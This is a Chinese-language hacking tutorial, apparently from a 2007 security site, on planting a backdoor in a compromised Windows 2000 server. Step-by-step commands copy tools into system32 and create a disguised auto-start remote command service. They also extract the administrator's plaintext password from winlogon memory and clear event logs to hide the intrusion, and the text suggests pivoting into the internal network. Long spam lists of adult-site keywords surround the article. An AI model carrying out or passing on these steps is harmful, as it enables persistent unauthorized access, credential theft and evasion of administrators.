国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

入侵Windows2000系統放置后門的方法
2007-01-08   

目前一般情況下,入侵Windows2000后使用最多的后門是RemoteNc了,但該工具有一很大的缺點,容易被殺毒軟件查出,而且如果用Fport或Active Ports等軟件也可以看到它監聽的端口,這很容易讓管理員發現。

對于Windows2000下的后門推薦使用Windows2000 Resoruce Kit中自帶的一個小工具Rcmdsvc.exe和Rcmd.exe,這是微軟自己出的一個用來在命令行下遠程管理主機的小工具。它有以下優點:
1、不會被殺毒軟件認為是病毒或后門程序,畢竟這是微軟自己出的東西。
2、非常隱蔽,它開的端口是445,和Windows2000系統的Microsoft-DS服務開的端口一樣,用Fport或Active Ports都不能列出它正在監聽的端口。

下面我們來看一次實際的操作,當然進行以下操作之前假設已經具有以下條件:
1、你已經取得了xxx.xxx.xxx.xxx的管理員權限;
2、該機啟用了Tcp/Ip上的Netbios支持;
3、在IP安全策略中對139和445端口未進行屏蔽;
4、安全策略中對匿名連接的額外限制采用的是默認的安全選項。

如果后三條中有某條不能滿足,那么會讓我們的后續操作有些困難,不過仍然有其它辦法可以繼續,如果大家感興趣我會在以后的文章中說明。

c:\>net use z: \\xxx.xxx.xxx.xxx "password" /user:"administrator"

c:\>copy rcmdsvc.exe z:\winnt\system32
c:\>copy pulist.exe z:\winnt\system32
c:\>copy findpass.exe z:\winnt\system32
c:\>copy kill.exe z:\winnt\system32
c:\>copy clearel.exe z:\winnt\system32
c:\>copy clealog.cmd z:\winnt\system32
c:\>copy fpipe.exe z:\winnt\system32
c:\>copy msvcp60.dll z:\winnt\system32

拷貝一些常用的工具到對方服務器上,在這里對這些工具做一個簡要說明:

Rcmdsvc.exe Windows2000 Resource Kit中的遠程命令行服務器端程序;

Pulist.exe 可以列出系統進程和該進程所屬用戶的工具;

Findpass.exe 可以在winlogon.exe進程中查找指定用戶名的名文口令的工具;

Kill.exe 可以用pdi或進程名殺掉指定進程的工具;

Clearel.exe 清除系統、應用程序、安全日志的工具;

Clealog.cmd 同上;

Fpipe.exe 可以在命令行下做端口重定向的工具;

Msvcp60.dll vc的運行庫,這個東西其實不是必須的,但為了防止在某些缺少Msvcp60.dll的機上在運行Clealog清除日志時對方的機上會突然彈出一個對話框說缺少Msvcp60.dll的尷尬情況,最好把它一起復制過去。

c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath= 
c:\winnt\system32\rcmdsvc.exe type= own start= auto

在這里我們用sc在目標機xxx.xxx.xxx.xxx上創建了一個名為Remote Command Service的服務,啟動方式為自動。當然為了隱蔽,你最好把“Remote Command Service”這個服務名改成其它比較類似系統服務的名字,畢竟管理員不可能看著一個突然多出來的Remote Command而坐視不管,而且也顯的你太囂張了。

PS:sc.exe是Windows2000 Resource Kit中一個功能非常強大的對服務進行控制的工具,詳細的使用方法可以參考本站的《SC使用完全指南》。

c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"

SERVICE_NAME: rpc support services
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,
IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0

/*在這里我們用sc啟動剛才創建的Remote Command Service服務。*/ 

/*下面連上對方服務器*/

c:\>rcmd

Enter Server Name : xxx.xxx.xxx.xxx
Connect to \\xxx.xxx.xxx.xxx

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\Documents and Settings\Default User.WINNT>pulist

Process PID User
Idle 0
System 8
smss.exe 168 NT AUTHORITY\SYSTEM
csrss.exe 192 NT AUTHORITY\SYSTEM
winlogon.exe 212 NT AUTHORITY\SYSTEM
services.exe 240 NT AUTHORITY\SYSTEM
lsass.exe 252 NT AUTHORITY\SYSTEM
svchost.exe 408 NT AUTHORITY\SYSTEM
spoolsv.exe 436 NT AUTHORITY\SYSTEM
msdtc.exe 464 NT AUTHORITY\SYSTEM
svchost.exe 596 NT AUTHORITY\SYSTEM
llssrv.exe 624 NT AUTHORITY\SYSTEM
regsvc.exe 676 NT AUTHORITY\SYSTEM
rpcsvc.exe 692 NT AUTHORITY\SYSTEM
mstask.exe 716 NT AUTHORITY\SYSTEM
LSESS.EXE 792 NT AUTHORITY\SYSTEM
tlntsvr.exe 832 NT AUTHORITY\SYSTEM
VrUpSvr.exe 956 NT AUTHORITY\SYSTEM
winmgmt.exe 968 NT AUTHORITY\SYSTEM
dns.exe 980 NT AUTHORITY\SYSTEM
dfssvc.exe 1064 NT AUTHORITY\SYSTEM
POP3S.exe 1100 NT AUTHORITY\SYSTEM
smtpds.exe 1120 NT AUTHORITY\SYSTEM
svchost.exe 1384 NT AUTHORITY\SYSTEM
dllhost.exe 1316 NT AUTHORITY\SYSTEM
internat.exe 1308 SERVER\Administrator
conime.exe 1680 SERVER\Administrator
VRMONSVC.EXE 872 NT AUTHORITY\SYSTEM
inetinfo.exe 1456 NT AUTHORITY\SYSTEM
explorer.exe 1548 SERVER\Administrator
cmd.exe 1712 SERVER\Guest
pulist.exe 532 SERVER\Guest

/*我們可以看到winlogon.exe的進程號是212*/

C:\Documents and Settings\Default User.WINNT>findpass server 
administrator 212

To Find Password in the Winlogon process
Usage: fidp DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.
The WinLogon process id is 214 (0x000000d6).
To find server\administrator password in process 214 ...
The encoded password is found at 0x01a00800 and has a length of 3.
The logon information is: server/administrator/Tgrh87fd.
The hash byte is: 0xb8.

/*在winlogon中查找administrator的名文口令*/

C:\Documents and Settings\Default User.WINNT>clealog
clealog done

/*清除日志記錄*/

C:\Documents and Settings\Default User.WINNT>

到這里我們已經看到Administrator的密碼是Tgrh87fd。

至此我們拿到了管理員的密碼并安放了一個Rcmdsvc的后門,當然你還可以接著做許多事。比如利用Adam發現的Bug再克隆一個管理員賬號。或者用SC把對方的Tlntsvr服務啟起來。不過后者比較容易被發現,不推薦。如果你對他的內網的某臺機感興趣而且該機也有漏洞,可以用Fpipe做端口重定向后為下一步的進攻做準備。

責任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:黑客入門之漏洞分類及進一步發掘(1)
下一篇:將木馬拒之門外 設置電腦防止黑客入侵

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美在线综合视频| 91精品国产综合久久久久| 精品播放一区二区| 婷婷久久综合九色综合伊人色| 91视频观看免费| 亚洲乱码国产乱码精品精的特点 | 经典三级一区二区| 宅男在线国产精品| 美国十次综合导航| 精品国产青草久久久久福利| 韩国av一区二区三区四区| 2024国产精品| 北条麻妃一区二区三区| 亚洲视频在线观看一区| 在线播放亚洲一区| 国模大尺度一区二区三区| 国产婷婷色一区二区三区| 色婷婷综合久久久中文一区二区 | 午夜久久久影院| 国产欧美日韩精品在线| 色综合亚洲欧洲| 久久精品久久精品| 99综合影院在线| 韩国v欧美v日本v亚洲v| 蜜臀久久99精品久久久画质超高清| 欧美成人a∨高清免费观看| 欧美aaaaa成人免费观看视频| 2024国产精品| 欧美专区日韩专区| 久久av资源站| 欧美国产欧美综合| 色激情天天射综合网| 日日摸夜夜添夜夜添国产精品| 日韩欧美高清dvd碟片| 欧美日韩国产三级| 福利一区二区在线| 麻豆精品精品国产自在97香蕉| 亚洲麻豆国产自偷在线| 91精品欧美一区二区三区综合在| 91免费国产在线观看| 国模少妇一区二区三区| 久久99热这里只有精品| 亚洲成人777| 日本成人中文字幕| 美腿丝袜一区二区三区| 国产欧美日韩在线观看| 成人美女在线观看| 欧美日韩综合在线免费观看| 欧美mv日韩mv国产网站| 欧美一级免费观看| 久久一留热品黄| 久久久久久久久久久电影| 欧美一卡在线观看| 久久色在线观看| 国产亚洲婷婷免费| 亚洲欧洲国产专区| 午夜精品久久久久久久久久久 | av午夜一区麻豆| 色88888久久久久久影院野外| 在线免费观看日本欧美| 欧美色爱综合网| 欧美福利视频一区| 国产精品免费久久| 一区二区三区在线视频观看58| 亚洲黄色小说网站| 蜜桃一区二区三区四区| 国产一区二区三区蝌蚪| 在线观看精品一区| 日韩精品一区二| 亚洲一二三区视频在线观看| 丁香六月综合激情| 欧美日韩国产首页在线观看| 国产欧美日韩在线| 五月婷婷综合网| 欧美三级视频在线观看| 91麻豆精品国产| 欧美精品一区二区三| 国产精品乱码妇女bbbb| 青青草97国产精品免费观看 | 日本一区二区三区免费乱视频 | 亚洲黄网站在线观看| 国产高清不卡一区| 欧美色图在线观看| 国产精品久久久久毛片软件| 久久不见久久见免费视频7| 欧美日精品一区视频| 一区二区在线观看视频| 国产成人精品网址| 欧美本精品男人aⅴ天堂| 亚洲第一搞黄网站| 日本道免费精品一区二区三区| 久久综合九色综合欧美98| 日本伊人午夜精品| 欧美日韩1区2区| 日韩中文字幕一区二区三区| 欧美日韩在线三区| 亚洲一区二区三区精品在线| 在线精品视频小说1| 亚洲日本va午夜在线影院| 97久久久精品综合88久久| 最近日韩中文字幕| 色欧美日韩亚洲| 亚洲影院理伦片| 欧美精品三级日韩久久| 日韩 欧美一区二区三区| 日韩一区二区免费电影| 国产精品996| 亚洲色图欧洲色图婷婷| 欧美影院一区二区| 日本视频在线一区| 国产日韩欧美综合一区| av在线一区二区三区| 国产精品久久久久7777按摩 | 中文字幕欧美三区| 国内偷窥港台综合视频在线播放| 国产精品免费丝袜| 成人激情电影免费在线观看| 亚洲日本丝袜连裤袜办公室| 91高清视频在线| 激情文学综合丁香| 一区视频在线播放| 欧美三级电影精品| 国产麻豆91精品| 亚洲成人动漫在线免费观看| 久久久久免费观看| 一本久道中文字幕精品亚洲嫩| 玉米视频成人免费看| 国产天堂亚洲国产碰碰| 欧美日韩高清影院| 成人激情电影免费在线观看| 亚洲欧洲无码一区二区三区| 精品蜜桃在线看| 在线视频你懂得一区二区三区| 久久精品国产色蜜蜜麻豆| 中文字幕在线观看不卡视频| 日韩精品一区二区三区三区免费| av一区二区久久| 国内久久精品视频| 亚洲激情图片小说视频| 精品不卡在线视频| 欧美日韩国产一区二区三区地区| 国产精品羞羞答答xxdd| 午夜精品一区二区三区免费视频| 久久综合视频网| 欧美夫妻性生活| 欧美日韩aaaaaa| 欧美久久一区二区| 欧美喷潮久久久xxxxx| 91麻豆成人久久精品二区三区| 国内久久婷婷综合| 乱中年女人伦av一区二区| 九色综合国产一区二区三区| 亚洲国产精品久久不卡毛片| 久久久久免费观看| 日韩欧美亚洲国产精品字幕久久久| 欧美男生操女生| 91黄色免费观看| 日韩精品一区二区在线观看| 欧美电影免费观看高清完整版在线| 欧洲中文字幕精品| 欧美一区二区视频在线观看 | 精品福利二区三区| 欧美国产国产综合| 国产精品美女久久久久av爽李琼 | 日韩欧美国产小视频| 久久久av毛片精品| xf在线a精品一区二区视频网站| 国产精品成人午夜| 亚洲精品五月天| 日韩影院免费视频| 成人小视频在线| 欧美男人的天堂一二区| 日本一区二区三区久久久久久久久不 | 亚瑟在线精品视频| 日韩精品一二三四| 成人免费视频视频| 精品精品欲导航| 夜夜操天天操亚洲| 国产一区二区三区av电影| 在线亚洲人成电影网站色www| 欧美影片第一页| 中文字幕精品在线不卡| 亚洲精品少妇30p| 国内成人自拍视频| 欧美一卡二卡三卡| 亚洲欧美一区二区三区极速播放| 日韩高清一区在线| 色偷偷88欧美精品久久久| 中文成人av在线| 紧缚捆绑精品一区二区| 777久久久精品| 三级一区在线视频先锋 | 欧美日韩一区三区四区| 精品一区二区三区av| av网站一区二区三区| 国产精品自在在线| 国产一区二区免费看| 欧美日韩亚洲综合在线| 亚洲综合激情网| 亚洲一区在线观看免费观看电影高清 |